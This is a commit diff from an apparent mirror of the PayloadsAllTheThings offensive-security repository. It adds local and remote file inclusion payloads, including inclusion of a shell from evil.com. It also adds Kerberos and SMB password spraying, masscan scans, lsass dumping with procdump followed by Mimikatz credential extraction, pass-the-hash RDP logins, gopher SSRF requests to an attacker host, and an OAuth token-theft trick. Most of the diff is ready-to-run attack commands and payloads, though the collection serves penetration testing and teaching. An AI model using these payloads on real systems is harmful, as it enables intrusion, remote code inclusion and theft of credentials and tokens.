mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp
This commit is contained in:
parent
765c615efe
commit
bab04f8587
@ -7,6 +7,10 @@
|
||||
## Summary
|
||||
|
||||
* [Basic LFI](#basic-lfi)
|
||||
* [Null byte](#null-byte)
|
||||
* [Double encoding](#double-encoding)
|
||||
* [Path truncation](#path-truncation)
|
||||
* [Filter bypass tricks](#filter-bypass-tricks)
|
||||
* [Basic RFI](#basic-rfi)
|
||||
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||
* [Wrapper php://filter](#wrapper-phpfilter)
|
||||
@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
|
||||
http://example.com/index.php?page=../../../etc/passwd
|
||||
```
|
||||
|
||||
Null byte
|
||||
### Null byte
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../etc/passwd%00
|
||||
```
|
||||
|
||||
Double encoding
|
||||
### Double encoding
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
||||
```
|
||||
|
||||
Path truncation
|
||||
### Path truncation
|
||||
|
||||
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
|
||||
http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE]
|
||||
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
|
||||
```
|
||||
|
||||
Filter bypass tricks
|
||||
### Filter bypass tricks
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=....//....//etc/passwd
|
||||
@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
|
||||
http://example.com/index.php?page=http://evil.com/shell.txt
|
||||
```
|
||||
|
||||
Null byte
|
||||
### Null byte
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
||||
```
|
||||
|
||||
Double encoding
|
||||
### Double encoding
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
||||
@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
|
||||
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
||||
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
||||
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
||||
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||
|
@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||
enum4linux | grep -i desc
|
||||
There are 3-4 fields that seem to be common in most AD schemas:
|
||||
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
||||
|
||||
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
|
||||
```
|
||||
|
||||
### PassTheTicket Golden Tickets
|
||||
@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module
|
||||
|
||||
### Password spraying
|
||||
|
||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
||||
|
||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||
|
||||
```powershell
|
||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||
```
|
||||
|
||||
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||
|
||||
```powershell
|
||||
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||
```
|
||||
|
||||
Most of the time the best passwords to spray are :
|
||||
|
||||
- Password1
|
||||
|
@ -8,6 +8,7 @@
|
||||
* The Harvester
|
||||
|
||||
* [Active Recon](#active-recon)
|
||||
* Masscan
|
||||
* Nmap
|
||||
* Nmap Script
|
||||
* RPCClient
|
||||
@ -47,6 +48,13 @@
|
||||
|
||||
## Active recon
|
||||
|
||||
* Masscan
|
||||
|
||||
```powershell
|
||||
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||
```
|
||||
|
||||
* Basic NMAP
|
||||
|
||||
```bash
|
||||
|
@ -1,38 +1,14 @@
|
||||
# Network Discovery
|
||||
|
||||
## Netdiscover
|
||||
## Summary
|
||||
|
||||
```powershell
|
||||
netdiscover -i eth0 -r 192.168.1.0/24
|
||||
Currently scanning: Finished! | Screen View: Unique Hosts
|
||||
|
||||
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
|
||||
_____________________________________________________________________________
|
||||
IP At MAC Address Count Len MAC Vendor / Hostname
|
||||
-----------------------------------------------------------------------------
|
||||
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
|
||||
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
|
||||
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
|
||||
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
|
||||
```
|
||||
|
||||
## Responder
|
||||
|
||||
```powershell
|
||||
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
|
||||
responder.py -I eth0 -wrf
|
||||
```
|
||||
|
||||
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
||||
|
||||
## Bettercap
|
||||
|
||||
```powershell
|
||||
bettercap -X --proxy --proxy-https -T <target IP>
|
||||
# better cap in spoofing, discovery, sniffer
|
||||
# intercepting http and https requests,
|
||||
# targetting specific IP only
|
||||
```
|
||||
- [Nmap](#nmap)
|
||||
- [Masscan](#masscan)
|
||||
- [Netdiscover](#netdiscover)
|
||||
- [Responder](#responder)
|
||||
- [Bettercap](#bettercap)
|
||||
- [Reconnoitre](#reconnoitre)
|
||||
- [References](#references)
|
||||
|
||||
## Nmap
|
||||
|
||||
@ -121,6 +97,13 @@ Host script results:
|
||||
List Nmap scripts : ls /usr/share/nmap/scripts/
|
||||
```
|
||||
|
||||
## Masscan
|
||||
|
||||
```powershell
|
||||
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||
```
|
||||
|
||||
## Reconnoitre
|
||||
|
||||
Dependencies:
|
||||
@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
|
||||
If you have a segfault with nbtscan, read the following quote.
|
||||
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
||||
|
||||
## Netdiscover
|
||||
|
||||
```powershell
|
||||
netdiscover -i eth0 -r 192.168.1.0/24
|
||||
Currently scanning: Finished! | Screen View: Unique Hosts
|
||||
|
||||
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
|
||||
_____________________________________________________________________________
|
||||
IP At MAC Address Count Len MAC Vendor / Hostname
|
||||
-----------------------------------------------------------------------------
|
||||
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
|
||||
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
|
||||
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
|
||||
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
|
||||
```
|
||||
|
||||
## Responder
|
||||
|
||||
```powershell
|
||||
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
|
||||
responder.py -I eth0 -wrf
|
||||
```
|
||||
|
||||
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
||||
|
||||
## Bettercap
|
||||
|
||||
```powershell
|
||||
bettercap -X --proxy --proxy-https -T <target IP>
|
||||
# better cap in spoofing, discovery, sniffer
|
||||
# intercepting http and https requests,
|
||||
# targetting specific IP only
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [TODO](TODO)
|
@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
|
||||
## Spawn TTY Shell
|
||||
|
||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||
|
||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
||||
|
||||
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
|
||||
|
||||
```powershell
|
||||
ctrl+z
|
||||
echo $TERM && tput lines && tput cols
|
||||
|
||||
# for bash
|
||||
stty raw -echo
|
||||
fg
|
||||
|
||||
# for zsh
|
||||
stty raw -echo; fg
|
||||
|
||||
reset
|
||||
export SHELL=bash
|
||||
export TERM=xterm-256color
|
||||
|
@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
|
||||
mimikatz_command -f sekurlsa::wdigest
|
||||
```
|
||||
|
||||
## Mimikatz - Mini Dump
|
||||
|
||||
Dump the lsass process.
|
||||
|
||||
```powershell
|
||||
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||
|
||||
net use Z: https://live.sysinternals.com
|
||||
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||
```
|
||||
|
||||
Then load it inside Mimikatz.
|
||||
|
||||
```powershell
|
||||
mimikatz # sekurlsa::minidump lsass.dmp
|
||||
Switch to minidump
|
||||
mimikatz # sekurlsa::logonPasswords
|
||||
```
|
||||
|
||||
## Mimikatz Golden ticket
|
||||
|
||||
```powershell
|
||||
|
@ -119,18 +119,20 @@ or with crackmapexec
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
```
|
||||
|
||||
For Server 2012 R2, Win8.1+
|
||||
|
||||
```powershell
|
||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
||||
```
|
||||
|
||||
with Metasploit
|
||||
or with Metasploit
|
||||
|
||||
```powershell
|
||||
run getgui -u admin -p 1234
|
||||
```
|
||||
|
||||
Then log in using xfreerdp
|
||||
|
||||
```powershell
|
||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||
```
|
||||
|
||||
|
||||
## Netuse (Windows)
|
||||
|
||||
```powershell
|
||||
|
@ -1,4 +1,20 @@
|
||||
# OAuth 2 - Common vulnerabilities
|
||||
# OAuth
|
||||
|
||||
## Summary
|
||||
|
||||
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
|
||||
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
|
||||
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
|
||||
- [OAuth private key disclosure](#oauth-private-key-disclosure)
|
||||
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
|
||||
- [Cross-Site Request Forgery](#cross-site-request-forgery)
|
||||
- [References](#references)
|
||||
|
||||
## Stealing OAuth Token via referer
|
||||
|
||||
From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
|
||||
|
||||
> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer
|
||||
|
||||
## Grabbing OAuth Token via redirect_uri
|
||||
|
||||
|
@ -2,7 +2,7 @@
|
||||
|
||||
A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
I <3 pull requests :)
|
||||
I :heart: pull requests :)
|
||||
|
||||
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
||||
|
||||
|
@ -277,6 +277,13 @@ You didn't say the magic word !
|
||||
QUIT
|
||||
```
|
||||
|
||||
#### Gopher HTTP
|
||||
|
||||
```powershell
|
||||
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
|
||||
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
|
||||
```
|
||||
|
||||
#### Gopher SMTP - Back connect to 1337
|
||||
|
||||
```php
|
||||
|
@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
|
||||
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
|
||||
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
|
||||
- he is able to make stored XSS from a irrelevant domain to main facebook domain
|
||||
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
|
||||
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
|
||||
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
|
||||
|
Loading…
Reference in New Issue
Block a user